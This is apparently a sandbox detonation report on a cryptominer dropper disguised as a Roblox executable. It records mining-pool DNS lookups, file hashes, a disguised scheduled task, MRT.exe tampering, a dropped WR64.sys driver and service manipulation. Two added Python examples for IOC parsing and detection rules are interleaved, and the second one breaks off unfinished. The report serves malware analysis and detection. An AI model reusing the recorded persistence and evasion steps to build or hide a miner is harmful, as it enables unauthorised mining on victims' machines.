"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,17555345601849265513,14395857992340366075,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 neoblox.is-from.space udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 github.com udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 pool.hashvault.pro udp

Files

C:\Users\Admin\AppData\Local\Temp\Neoblock's Level 7.exe

MD5 fa532255379e9d0135b519e96b62f6ca
SHA1 099c0338db1a0aedf4e050ad0be7380034cf149e
SHA256 3335ee3c5d3f45de09712165a407755a051e5a2c812fa2a87d81431b5b3c583a
SHA512 fd2176004c7235bf215c2c62064559c023e47aa5def987c8344765d5f67a1dfb74e0bfb0ecd044bb1be247b3db4204a8c8bd2cbe622ba99bd81f0a6921c2bd4e

memory/4452-11-0x0000000004700000-0x0000000004736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\neobloxBootstrapper.exe

MD5 07c00a89b882adab59d0b2e6eeac3516
SHA1 05ef4e1c48a3d081bb535b979e0e88a242cfdd48
SHA256 719f686324040140c4d8b03c5a35c4036b2a5535f1ee5aaf50ad79f2367126e2
SHA512 6a98ce5df9a7fbeb910bbea419b22794b7b4cde06f19222e55c1a21642a1e7b0036ae95022006de7ce8eabca78773ec07b01ee6e9d6ef6a6d7b62aebf5e15401

memory/4452-23-0x0000000004D70000-0x0000000005398000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

MD5 fa9383ead577a1004af69c84708d66e0
SHA1 db0472630e63ae1819fdadbef7def6bbeb0c485e
SHA256 e8e0c6615894c8eecdb536ea891f042ca35e44afac88beddb9e9a4c79bb3c293
SHA512 6f67a6e52910c578e8ec953bfc1fb17d49b7fc1bc0337a5e3fe41e4572f0e2bdeaeb45b2be44ceda471ba64e8381cd08bdca1faec7dc2cdc67c6534e007ffd92

memory/1076-38-0x00000000009D0000-0x0000000000A26000-memory.dmp

memory/1076-41-0x0000000002B90000-0x0000000002B9A000-memory.dmp

memory/3236-43-0x0000000005740000-0x00000000057A6000-memory.dmp

memory/3236-44-0x00000000057B0000-0x0000000005816000-memory.dmp

memory/3236-42-0x00000000056A0000-0x00000000056C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_munw2ufq.4c2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3236-59-0x0000000006140000-0x0000000006494000-memory.dmp

memory/3236-67-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/3236-66-0x0000000006750000-0x000000000676E000-memory.dmp

memory/3236-68-0x0000000006D00000-0x0000000006D32000-memory.dmp

memory/3236-70-0x0000000074F50000-0x0000000074F9C000-memory.dmp

memory/4452-69-0x0000000074F50000-0x0000000074F9C000-memory.dmp

memory/3236-88-0x0000000006D60000-0x0000000006D7E000-memory.dmp

memory/3236-90-0x0000000007760000-0x0000000007803000-memory.dmp

memory/3236-91-0x00000000080B0000-0x000000000872A000-memory.dmp

memory/3236-92-0x0000000007A70000-0x0000000007A8A000-memory.dmp

memory/4452-93-0x0000000007010000-0x000000000701A000-memory.dmp

memory/3236-94-0x0000000007D00000-0x0000000007D96000-memory.dmp

memory/3236-95-0x0000000007C70000-0x0000000007C81000-memory.dmp

memory/4452-96-0x00000000071D0000-0x00000000071DE000-memory.dmp

memory/3236-97-0x0000000007CC0000-0x0000000007CD4000-memory.dmp

memory/3236-98-0x0000000007DA0000-0x0000000007DBA000-memory.dmp

memory/4452-99-0x00000000072B0000-0x00000000072B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 423629ec0277e7b99545147f21d5019f
SHA1 5f17659cec900cc192fa6677f596ac32b08e2eb1
SHA256 8df3a3794edf298f789c77ec2012ea1de041826cd4a084f227b7e6d4217c98a3
SHA512 e9e287c7e81f577cc9dae3dc94455b8ce65ec399969e1a7296748c4f0e83ca1f9cb3013d7fa04a07cf5b3c713b8a42181943810eaa1380376be954d6fd443558

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/3264-105-0x00007FF7F53C0000-0x00007FF7F8C73000-memory.dmp

memory/5016-115-0x0000022FB0580000-0x0000022FB05A2000-memory.dmp

memory/2036-122-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-124-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-121-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-125-0x00007FFFBC790000-0x00007FFFBC985000-memory.dmp

memory/2036-126-0x00007FFFBAA50000-0x00007FFFBAB0E000-memory.dmp

memory/2036-120-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2036-119-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1020-142-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/952-145-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/748-151-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1088-164-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/892-175-0x000001DD98390000-0x000001DD983BB000-memory.dmp

memory/1156-180-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1156-179-0x00000240FA280000-0x00000240FA2AB000-memory.dmp

memory/1080-173-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1080-172-0x000002444EAE0000-0x000002444EB0B000-memory.dmp

memory/1100-170-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/1100-169-0x000001831B160000-0x000001831B18B000-memory.dmp

memory/1088-163-0x000002BC29C60000-0x000002BC29C8B000-memory.dmp

memory/748-150-0x000001DFAFD40000-0x000001DFAFD6B000-memory.dmp

memory/1020-141-0x0000014AE74A0000-0x0000014AE74CB000-memory.dmp

memory/952-144-0x0000016ECA7E0000-0x0000016ECA80B000-memory.dmp

memory/664-137-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/664-136-0x0000021692830000-0x000002169285B000-memory.dmp

memory/616-134-0x00007FFF7C810000-0x00007FFF7C820000-memory.dmp

memory/616-133-0x0000024BE2EE0000-0x0000024BE2F0B000-memory.dmp

memory/616-131-0x0000024BE2E50000-0x0000024BE2E74000-memory.dmp

memory/2036-128-0x0000000140000000-0x000000014002B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/5116-425-0x0000019D527A0000-0x0000019D527BC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b80cd7a712469a4c45fec564313d9eb
SHA1 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512 ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

memory/5116-427-0x0000019D527C0000-0x0000019D52875000-memory.dmp

memory/5116-428-0x0000019D52880000-0x0000019D5288A000-memory.dmp

memory/5116-433-0x0000019D529F0000-0x0000019D52A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

memory/5116-455-0x0000019D529D0000-0x0000019D529DA000-memory.dmp

memory/5116-456-0x0000019D52A30000-0x0000019D52A4A000-memory.dmp

memory/5116-457-0x0000019D529E0000-0x0000019D529E8000-memory.dmp

memory/5116-458-0x0000019D52A10000-0x0000019D52A16000-memory.dmp

memory/5116-459-0x0000019D52A20000-0x0000019D52A2A000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

memory/4696-747-0x000001FDD9FF0000-0x000001FDDA0A5000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a62448b7c56d7bd585bd0c3ea436ff97
SHA1 1e9fa0b1d1adaaa5d5d31e2ea8ec7b53c249ee4c
SHA256 9e50f53f856afadf15ae4e3685e35c2d23962bc6fdc03ed65ff27b06218a6784
SHA512 ad85bb14f6493c90db13c4a4f87c46c4ff954d535ffffdf0b9222545e135f7abc435c74033e54162230110439b8b55526922d173dd497977ce01ff754881a5ff

memory/3192-917-0x0000015E1D690000-0x0000015E1D745000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

\??\pipe\LOCAL\crashpad_2932_UMJESZLWBLUAEFQL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a8e767fd33edd97d306efb6905f93252
SHA1 a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256 c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA512 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4a2854a78e226c6318cc624c76fca9ed
SHA1 68b93c338081f2c91b787d145a8ab9f831a89d76
SHA256 ce17d49912cece820a5d3a568f89d8f132e52e07c0a0fff37955a920bd2072d4
SHA512 683913a327740ffd18f270b8796072e1cf6ef33aa96254db5255220e4baa25e38bc0ce721765e72c86c42e7ce9153e359973e1981057a7c49fe8b697fb7fd194

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5b579f6015d0c4959efe5f6867e885b0
SHA1 fef733f5df2d96bd756c8f4acf7ecfebc790064f
SHA256 c045645d9aacaf2001e1c072811dacbfcacef1a87e41df205f85860ff3a20f39
SHA512 aad798a7c16d9a3a01471d767cb380190f869393f9cc359f711bedb4538793db6733303d52e05e7c9dfe25fb94bb39dd332deb7d5b597028e8a032df031697c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5582e84313f913ac577a0a161c30a31e
SHA1 feae74453b9b6581d9d8aea7309a25e3a1c57a78
SHA256 283ce8a9e4d966295de6de9a05a95970b98f3600b4d33493ab31257464fefd5b
SHA512 1dcd50944e136ebda6df947493f2dc8e4d74097f8bff78b5ab86dacac3a973f1411d18eed9dd7cf31a0aed3ddb3c08b1d0ed42b0a3fb7bacf121bfc48be72dc3
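
The Network table and the Files list above are flat text, and pulling usable IOCs out of them by hand is error-prone: the crashpad named pipe entry carries the digests of zero bytes (nothing was actually captured), the memory/... entries are dumps with no hashes, and the in-addr.arpa rows are the sandbox's own reverse lookups rather than sample activity. The repeated queries for pool.hashvault.pro, a public Monero mining pool, are the one name that matters. The Python below is an added example, not part of this report or of the sandbox's tooling: it parses an excerpt constructed from the rows above into records, checks that each digest has the length its algorithm requires, drops empty-content and memory-dump entries, and buckets the resolved names so the pool stands out from the noise. The mining-pool suffix list is an assumption (a starter list to extend from your own intel), and the report excerpt is constructed from the rows above.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Constructed excerpt: rows copied from the report's "Network" and "Files"
# sections above, in the report's own plain-text layout.
REPORT_EXCERPT = r"""
Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 neoblox.is-from.space udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\Roblox.exe

MD5 fa9383ead577a1004af69c84708d66e0
SHA1 db0472630e63ae1819fdadbef7def6bbeb0c485e
SHA256 e8e0c6615894c8eecdb536ea891f042ca35e44afac88beddb9e9a4c79bb3c293
SHA512 6f67a6e52910c578e8ec953bfc1fb17d49b7fc1bc0337a5e3fe41e4572f0e2bdeaeb45b2be44ceda471ba64e8381cd08bdca1faec7dc2cdc67c6534e007ffd92

memory/1076-38-0x00000000009D0000-0x0000000000A26000-memory.dmp

\??\pipe\LOCAL\crashpad_2932_UMJESZLWBLUAEFQL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

# Hex-digest length per algorithm; a line that fails this was mangled in copy/paste.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Digests of zero bytes: an entry carrying these was never really captured
# (here the crashpad named pipe) and is useless as an IOC.
EMPTY_DIGEST = {name: getattr(hashlib, name.lower())(b"").hexdigest() for name in HASH_LEN}
# Assumed starter list of public Monero mining-pool domains; pool.hashvault.pro
# is the one this sample resolves. Extend from your own threat intel.
MINING_POOL_SUFFIXES = ("hashvault.pro", "supportxmr.com", "nanopool.org")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")


@dataclass
class NetRow:
    country: str
    destination: str
    domain: str  # "" when the sandbox recorded no name (mDNS, direct TCP)
    proto: str


@dataclass
class FileEntry:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def is_memory_dump(self) -> bool:
        return self.path.startswith("memory/")

    @property
    def is_empty_content(self) -> bool:
        # True only when every recorded digest is the digest of zero bytes.
        return bool(self.hashes) and all(EMPTY_DIGEST[k] == v for k, v in self.hashes.items())

    def malformed_hashes(self) -> list:
        return [k for k, v in self.hashes.items() if len(v) != HASH_LEN[k]]


def is_mining_pool(domain: str) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in MINING_POOL_SUFFIXES)


def parse_report(text: str):
    """Split the report's flattened Network table and Files list into records."""
    rows, files, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("Network", "Files"):
            section = line
            continue
        if section == "Network":
            tokens = line.split()
            # The header row (and anything without host:port in column 2) is skipped;
            # the domain column may be empty, so it is whatever sits between the two.
            if len(tokens) < 3 or ":" not in tokens[1]:
                continue
            rows.append(NetRow(tokens[0], tokens[1], " ".join(tokens[2:-1]), tokens[-1]))
        elif section == "Files":
            m = HASH_RE.match(line)
            if m and files:
                files[-1].hashes[m.group(1)] = m.group(2)
            else:
                files.append(FileEntry(line))
    return rows, files


def classify_dns(rows):
    """Bucket the resolved names so real IOCs stand out from sandbox noise."""
    buckets = {"mining_pool": [], "reverse_lookup": [], "no_name": [], "other": []}
    for r in rows:
        if not r.domain:
            buckets["no_name"].append(r.destination)
        elif r.domain.endswith(".in-addr.arpa"):
            buckets["reverse_lookup"].append(r.domain)
        elif is_mining_pool(r.domain):
            buckets["mining_pool"].append(r.domain)
        else:
            buckets["other"].append(r.domain)
    # De-duplicate while keeping first-seen order.
    return {k: list(dict.fromkeys(v)) for k, v in buckets.items()}


if __name__ == "__main__":
    rows, files = parse_report(REPORT_EXCERPT)
    print(classify_dns(rows))
    for f in files:
        if f.is_memory_dump or f.is_empty_content:
            continue
        print(f.path, f.hashes.get("SHA256"), f.malformed_hashes())
```

Run as-is it prints one usable file hash (Roblox.exe) and puts pool.hashvault.pro alone in the mining_pool bucket; the 52.111.227.14:443 connection lands in no_name because the sandbox logged no name for it, so it needs a separate judgement rather than automatic blocking.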

Analysis: behavioral2

Detonation Overview

Submitted         2024-06-14 17:51
Reported          2024-06-14 17:54
Platform          win11-20240611-en
Max time kernel   135s
Max time network  135s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4896 created 2868 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\pcaui.exe

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe N/A
File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Roblox.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\ccccc.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
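
Read together, the file-system rows above describe a familiar miner-dropper layout: a binary in the user's Temp directory writes updater.exe under Program Files\Google\Chrome, that binary in turn drops WR64.sys (a name consistent with the WinRing0 driver XMRig-based miners load for MSR access; an inference, since the report does not hash that file), MRT.exe is opened for modification by two different droppers, a task named GoogleUpdateTaskMachineQC appears under System32\Tasks, and sc.exe is launched four times. One caveat when turning these rows into detections: the task file's acting process is svchost.exe because the Task Scheduler service writes task XML on behalf of whoever called it, so that row cannot be attributed to the dropper by process name; the task name and the "Uses Task Scheduler COM API" signature are the usable handles. The Python below is an added example, not the sandbox's own signature logic: it encodes those observations as reusable rules and runs them over events transcribed from the rows above. The path patterns and the security-tool name list are assumptions to tune locally.

```python
import re
from dataclasses import dataclass

# Transcribed (constructed for this example) from the behavioral2 signature rows
# above: (signature, description, indicator path, acting process). Paths contain
# spaces, so the rows are given as tuples rather than re-split from the flat text.
EVENTS = [
    ("Drops file in System32 directory", "File opened for modification",
     r"C:\Windows\system32\MRT.exe", r"C:\ProgramData\zpjeqqssntxg\ndfstabgdmbm.exe"),
    ("Drops file in System32 directory", "File opened for modification",
     r"C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC", r"C:\Windows\system32\svchost.exe"),
    ("Drops file in System32 directory", "File opened for modification",
     r"C:\Windows\system32\MRT.exe", r"C:\Users\Admin\AppData\Local\Temp\Roblox.exe"),
    ("Drops file in Program Files directory", "File created",
     r"C:\Program Files\Google\Chrome\updater.exe", r"C:\Users\Admin\AppData\Local\Temp\ccccc.exe"),
    ("Drops file in Program Files directory", "File created",
     r"C:\Program Files\Google\Libs\WR64.sys", r"C:\Program Files\Google\Chrome\updater.exe"),
    ("Launches sc.exe", "N/A", "N/A", r"C:\Windows\system32\sc.exe"),
]

# Assumed path classes; adjust for non-default drive letters or profile paths.
USER_WRITABLE = re.compile(r"^C:\\(Users\\[^\\]+\\AppData|ProgramData|Users\\Public)\\", re.I)
SYSTEM_DIRS = re.compile(r"^C:\\(Windows|Program Files( \(x86\))?)\\", re.I)
TASK_DIR = re.compile(r"^C:\\Windows\\System32\\Tasks\\(.+)$", re.I)
DRIVERS_DIR = "c:\\windows\\system32\\drivers\\"
# Assumed list: MRT.exe is the Malicious Software Removal Tool, the other two are Defender.
SECURITY_TOOLS = {"mrt.exe", "msmpeng.exe", "mpcmdrun.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    path: str
    note: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Run each rule over every event; one event may raise several findings."""
    findings = []
    for signature, desc, indicator, process in events:
        name = basename(indicator)
        from_user_writable = bool(USER_WRITABLE.match(process))
        modified = "modification" in desc

        # Installers write into Program Files; files run out of Temp/ProgramData do not.
        if desc == "File created" and name.endswith(".exe") and SYSTEM_DIRS.match(indicator) and from_user_writable:
            findings.append(Finding("staged_binary_into_system_dir", "high", indicator,
                                    f"written by {process}"))
        # A kernel driver dropped anywhere but System32\drivers deserves a look
        # regardless of who wrote it.
        if name.endswith(".sys") and not indicator.lower().startswith(DRIVERS_DIR):
            findings.append(Finding("driver_outside_drivers_dir", "high", indicator,
                                    f"dropped by {process}; check the service ImagePath that loads it"))
        if name in SECURITY_TOOLS and modified:
            findings.append(Finding("security_tool_tampering", "critical", indicator,
                                    f"opened for write by {process}"))
        m = TASK_DIR.match(indicator)
        if m and modified:
            # Task XML is written by the Task Scheduler service (svchost.exe), never by
            # the caller, so attribute via the task name, not the acting process.
            findings.append(Finding("scheduled_task_written", "medium", indicator,
                                    f"task name {m.group(1)!r}; attribute via the COM API caller"))
        if signature == "Launches sc.exe":
            findings.append(Finding("sc_exe_launched", "low", process,
                                    "service create/stop; pair with 'Sets service image path in registry'"))
    return findings


def hunt_paths(findings):
    """Distinct on-disk artefacts to check on other hosts, highest severity first."""
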